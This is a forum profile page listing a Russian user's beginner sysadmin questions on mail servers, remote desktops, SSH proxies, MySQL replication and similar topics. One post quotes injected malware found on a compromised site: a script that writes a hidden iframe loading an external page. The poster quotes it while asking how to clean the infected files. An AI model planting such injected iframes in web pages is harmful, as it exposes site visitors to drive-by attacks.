LINUX.ORG.RU

Сообщения xl743

Посоветуйте opensource голосовой чат с шифрованием!

Наша контора хочет уйти от Скайпа, нужна альтернатива - голосовой чат с открытым кодом и с возможностью шифрования, чтобы всё шло через свой сервер (Debian/Ubuntu).

Смотрел на Mumble - чего-то не понравилось. Очень замороченный ACL - людям будет сложно (бухгалтерши и прочие граждане) - много возни с групповухой, а нужно реально - разговор один на один.

Посоветуйте пожалуйста, кто как эту проблему решает!

xl743
()

Как заставить spamassassin складывать спам в юзерские поддиректории, доступные по IMAP?

Здравствуйте! Я начинающий админ, и уже запутался! Настроил сервер с Postfix, Dovecot, Amavis, Spamassassin с виртуальными доменами и пользователями. Проблема в том, что spamassassin кладёт спам в /var/lib/amavis/virusmails. А я бы хотел, чтобы спам он клал каждому пользователю в его его личную почту, в папку Spam.

Не могу найти, как это сделать! Нашёл варианты с procmail, но непонятно, как его туда вообще внедрить, у меня его нет. Подскажите пожалуйста что-то относительно конкретное, где почитать/посмотреть.

xl743
()

Подскажите, как забрать всю почту для домена на GMail в формат Maildir?

Есть почтовый домен на GMail с кучей аккаунтов. Хочу перевести всё это на свой сервер под postfix/dovecot. Сам сервер уже поднял, всё работает. Подскажите, есть ли какой-то способ все аккаунты одним махом в Maildir перевести, чтобы не по одному?

Или, если нет способа всё одним махом, как это максимально эффективно сделать?

xl743
()

Интересует статистика: должен ли PHP/Python/ASP.NET/etc. программист знать тонкости HTML/JS/CSS?

Спросить живьём - некого, нет знакомых веб-программистов. Но интересует, знают ли программисты на PHP, Python и т.д. (на чём пишут сайты) тонкости HTML, JavaScript, CSS, и т.д.? Или чаще получают страницы в готовом виде, а потом с помощью чего-то типа Smarty их кромсают и вставляют код?

Понятно, что может быть и так, и так. Но как обычно и чаще это происходит?

xl743
()

Расскажите, как Вы изучаете новые технологии/языки?

Прошу совета. Я ещё учусь, и опыта - маловато. Но уже столкнулся с такой проблемой - трудно даются новые технологии/языки программирования!

Короткий пример. На работе нужно было довести до ума одну программа на Java. Программистов на Java у нас - нет! А поскольку я новенький - мне выдали эту задачу. Мол, опытных отвлекать не будем, а ты учи/делай. Сделаешь - молодец, нет - будем думать дальше, что с тобой делать. В общем, проковырялся я две недели, но сделал, благо, оно было не сложно. Но! Во-первых, давалось очень трудно, во-вторых, через полгода уже почти ничего по Java не помню, даже то, что читал!

Другой пример. Я на C++ в Visual Studio на работе пишу около 2-х лет, но некоторые аспекты плюсов - боюсь! Например, стараюсь обходиться без template-ов и прочей «магии». Т.е., двух лет опыта - явно мало. А, может, подход неправильный.

В связи с этим вопрос к опытным людям. Как Вы изучаете новые технологии/языки? Читаете ли сначала какой-то учебник типа «скорочтением», а потом вдаётесь в подробности или перечитываете повторно? Или зубрите и делаете все упражнения и «краткое обучение» на полгода и больше затягивается, чтоб хоть азы постичь? И можно ли обходиться без «повторных чтений»? Или вообще, сразу в бой кидаетесь, а потом только по ходу дела проясняете в документации/справочниках? В общем, расскажите пожалуйста, как оптимизировать процесс обучения?

Понимаю, что так в двух словах не расскажешь, но прошу не смеяться, а подсказать и направить.

xl743
()

Отцы, чем читаете сырцы?

Подскажите, чем можно комфортно читать исходники на Си и Си++? Хочу приносить пользу, читать код ядра и других проектов. Читаю сейчас банальным less'ом, но неудобно! Vim - удобнее (из-за подсветки синтаксиса), но всё равно не то! Вызов функции - и начинаешь grep-ом рыскать по файлам!

Можно ли это как-то «автоматизировать»? Уверен, что есть какие-то инструменты.

Подскажите, как и в чём вы код читаете?

xl743
()

Как получить wi-fi 300 МБит на Intel N2230?

Здравствуйте! У меня есть ноут ASUS с сетевой картой Intel N2230, которая заявлена на 300 Мбит. С ноутом шла винда, в которой я эти самые 300 Мбит вижу, так что и карта, и роутер - поддерживают 300 МБит точно. Поставил Ubuntu 13.04, смотрю - скорость вай-фай - 65 Мбит, иногда, очень эпизодически, вижу показания - 130 МБит.

Подскажите, как получить 300 Мбит для этой карты в Linux? В винде надо было ширину канала выставить в «авто» вместо «20 МГц», а тут как? Я вообще не очень разбираюсь в вай-фай в Linux, если будут ответы - расскажите подробнее пожалуйста!

xl743
()

Удалённое безопасное монтирование /home/user, что посоветуете?

Недавно я создал тему, но по ней пока ясности нет, потому я решил попробовать идти другим путём.

Задача такая. Есть офис, в котором несколько машин. Владелец офиса почему-то опасается каких-то проверок! И хочет, чтобы все работы велись удалённо, чтоб, если проверяющий прийдёт - ничего чтоб не нашёл (я даже сам не знаю, что там искать будут)!. Задачи - обыденные: браузер, почта, офисный пакет, скайп. Идея в том, чтоб купить удалённый сервер, и чтоб всё выполнялось там, а в офисе - только отображалось. Сначала он просил настроить что-то типа VNC, но чтоб со звуком. Я пока что ничего не придумал, и из той темы выше ясности нет - пока ковыряюсь.

Но! Я вот о чём подумал. Может, проще было бы просто монтировать хомяки юзеров на удалённом сервере? Не нужно было бы пробрасывать звук, и т.д., и всё бы хранилось удалённо. Чтоб, например, юзер логинился в систему (например, Ubuntu), а потом запускал бы какую-то прогу, которая бы подменяла его локальный хомяк на удалённый - и там уже пошёл работать! Но тут такой момент: как это осуществить? NFS - в открытом виде всё гоняет, небезопасно. NFS over SSH - так там люди не разберутся, как запускать. В общем, я не хочу своим замыленным взглядом (я об этой проблеме думаю несколько дней!) мешать полёту мысли тех, кто, возможно, мне что-то посоветует, и направлять мысли в придуманное мной русло. Может, кто-то посоветует что-то неожиданно элегантное и простое?

Подскажите, как бы это делали Вы?

xl743
()

Многопользовательская удалённая Linux-система с графическим окружением, как?

Требуется на удалённом сервере поставить нечто такое, что позволит работать одновременно нескольким разным пользователям с «тонким клиентом» в графическом рабочем окружении - например в Gnome или в другом - и запускать браузер, офисный пакет, почту и даже скайп! Точнее, видео скайпа не нужно, но звонки голосом - типа нужны позарез!

Подскажите, можно ли это осуществить? Если да, то как? Мне тут советовали поставить Windows и ходить по RDP, но это уже какой-то совсем унылый вариант и я оставил его на самый крайний случай, да и в Windows не сильно разбираюсь! Отцы, подскажите, как это в родном Linux'е осуществить? Через VNC? Так надо будет несколько иксов поднимать. А как ещё - ничего на ум не приходит! Да ещё чтоб и со звуком.

xl743
()

Как делать update локальной машины, которая не смотрит в инет?

Такая проблема образовалась: есть удалённый сервер. Ему нужно делать backup на другой сервер. Владелец не хочет покупать ещё один полновесный сервер, а хочет купить сервер, который подключён только к внутренней сети провайдера и не будет способен идти в интернет - так дешевле! С первым сервером связь будет, т.к. на первом - 2 карты, одна для инета, вторая для локальных дел.

На backup-сервере планируется Debian, на основном - CentOS! Подскажите, как бы Вы делали обновления системы с Debian, которая не смотрит в инет?

У меня пока родились такие идеи:

- поднять на основном сервере http-прокси и ходить через него, но сервер хилый - не хотелось бы доп софта

- попробовать с помощью ssh открыть socks5-proxy, только как через socks делать apt-get и aptitude?

- настроить NAT - но это я никогда ещё не делал, т.к. я только учусь и сейчас занимаюсь разведкой боем! А ещё подозреваю, что через мой NAT смогут ходить другие люди, и жрать трафик!

Хостер предложил владельцу сервера делать локальное зеркало Дебиана на 1-м сервере, но я считаю это глупостью!

Отцы, наверняка тут есть корифеи в таких делах. Подскажите пожалуйста изящный ход!

xl743
()

Вирус! Помогите со скриптом, который его удалит!

Здравствуйте!

Меня попросили на дырявой машине удалить вирус! Там во многих тысячах html-файлов помещается такое:

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

В PHP-файлах тоже есть вирус, но немного другой! Я закрыл дырки в системе, всю ночь не спал, поменял все-все-все пароли ко всему. Выяснилось, что вирус внесли по FTP, видимо, пароль протёк, я обнаружил это по логам!

Теперь хочу вылечить все файлы. Подскажите со скриптом, пожалуйста. Я не особый скриптописатель, я ещё только учусь, попробовал удалять через tr - он на спецсимволы ругается! Все «подозрительные» символы заэкранировал с помощью «\» - то же самое! Через sed - тоже ошибка такая:

sed '\<\!\-\-c3284d\-\-\>\<script type=\"text\/javascript\"\>/d' /home/vitaly/public_html/templates/template_X_3_v13/template.html
sed: -e expression #1, char 58: unterminated address regex

Может кто сталкивался с такой бедой? Подскажите, как автоматически почистить тысячи файлов! Просто удалить строки - нельзя, там надо <body> сохранить (оно - не вирус).

xl743
()

Подскажите, как выбрать исходящий IP в SSH-туннеле!

У меня есть сервер, на котором навешано много адресов! Я хочу использовать сервер, как socks5 proxy. Всё получается, подключаюсь с помощью ssh -D, всё отлично работает, но! Я хочу руками выбрать, от какого именно IP-адреса из множества адресов на сервере будут идти мои коннекты. Сейчас они идут от одного и того же адреса, вне зависимости от того, к какому из множества адресов я соединяюсь командой ssh!

Вопрос, наверное, глупый, но я новенький, курил маны в ssh и не нашёл. Отцы, подскажите, как это сделать!

xl743
()

Задержка команды «su -», отцы, подскажите!

Выдали мне сервер Ubuntu 12.04 amd64. Всё бы ничего, но есть проблема! Когда я логинюсь обычным логином пользователя, а им делаю «sudo su -» - спрашивает пароль, я ввожу, и система «думает» 10 секунд! Но потом включается root, как положено!

Если делать sudo -i - мгновенно работает. От root'а тоже su - username быстро работает.

Отцы, подскажите, куда копать, чтобы избавиться от задержки? Я не то, что не могу без этого жить, но страшно интересно!

xl743
()

Отцы, расскажите, какие проблемы с видеокартами ATI/AMD?

Слышал, что с ATI/AMD картами в Линуксе много проблем! Но как-то толкового и вдумчивого описания их - нигде не видел! Подскажите, что реально будет плохо, если возьму ноут с ATI? Есть сейчас серия DELL 3550, мне нравится там всё, но вот карточка - ATI, потому не уверен можно ли брать!

Можно ли будет получить 3Д в Линуксе? Можно ли аппаратно декодировать видео? Можно ли избавиться от тиринга (в фильмах и на десктопе)? Будет ли с АТИ работать wine (пару 3д-игрушек в нём запускаю), будет ли KMS ???

У кого опыт, расскажите, как оно на практике, очень надо!

xl743
()

Детский вопрос по shell, подскажите!

Есть переменная TABLE, в которую попадает вывод другой команды. Там может быть либо ноль строк, либо одна, либо несколько. Мне надо проверить на предмет нуля строк. Делаю так:

if [ ! -n $TABLE ] ; then

и в том случае, когда в $TABLE несколько строк, получаю:

[: 199.10.8.52: unexpected operator

Отцы, подскажите, как правильнее сделать такую проверку?

xl743
()

[FreeBSD] Подскажите, как с помощью PF отслеживать всю активность, кроме определённой?

Стоит такая задача. Нужно следить за активностью с помощью PF и алярмить, если существует какая-то активность, кроме HTTP или SSH. Чтобы всё это дело логировалось. Как это сделать? Что-то не соображу. Может, уже кто-то делал?

xl743
()

Как откомпилировать или скрыть bash-скрипт в Debian?

У меня тут такая проблема. Надо показать заказчику рабочий хитрый bash-скрипт, который я написал по их заказу, но пока он не расплатится, не хочется скрипт выдавать открыто, а то может кинуть (в прошлый раз так и случилось).

Подскажите пожалуйста, можно ли как-то его откомпилировать или обфускатором каким пройтись, чтоб показать им в Дебиане, что всё отлично работает, получить деньги, а после этого - выдать им уже нормальный исходник?

Пробовал качать obfsh, но он чё-то не заработал в Дебиане.

xl743
()

Подскажите, как вы делаете автоматическую репликацию MySQL?

Нужно сделать репликацию MySQL. Все мануалы, где я про это читал, предполагают кучу ручной работы после каждого перезапуска мастера или слейва - руками лочить первый сервер, выяснять номер файла лога, позицию, куча дел на втором сервере (реплике), и т.д. Это неприемлемо в моих условиях. Подскажите, как вы делаете автоматическую репликацию, чтобы она *просто работала*? Т.е. два сервера, на «главном» - база, на «второстепенном» - чтобы была точная копия базы, чтобы вся эта красота переживала ребуты, рестарты, как мастера, так и слейва, чтобы не нужно было заходить и руками что-то делать. Тут ещё деталь - второстепенный лишь частично «второстепенный» - это отдельный сервер со своими базами, но просто как доп фишка этот второй сервер будет содержать копию баз первого.

Как это *грамотно* сделать? Может уже есть готовые решения? Наверняка ведь тем же вопросом задавался кто-то до меня.

Я перелопатил всё, до чего дотянулся, но ничего не нашёл. Надеюсь на помощь опытных коллег.

xl743
()

Порекомендуйте, как заливать большие (50 Мб) файлы в веб-приложении!

Пишем веб-приложение на PHP, нужно заливать большие файлы - метров по 40-50. Подскажите, как это правильнее делать? Просто через PHP - так там надо менять переменные max_input_time, max_execution_time, post_max_size, а также max_file_uploads, что небезопасно на продакшене. Заливать по (S)FTP - не хотят, говорят, надо чтобы можно было браузером. Подскажите, какие ещё есть варианты? Мне больше ничего на ум не приходит :(

xl743
()

Синхронизация по ftp

Стоит задача такая. Ежедневные бэкапы файла отправляются в архив, который надо как-то заливать на ftp (именно ftp), но так, чтобы с того ftp удалялись бэкапы старше 7 дней. Как локально сделать удаление - примерно представляю, но по ftp? Может, кто подскажет, должно же быть уже готовое решение где-то? Задача, должно быть, не такая и редкая. Но я не знаю, с какой стороны подойти.

xl743
()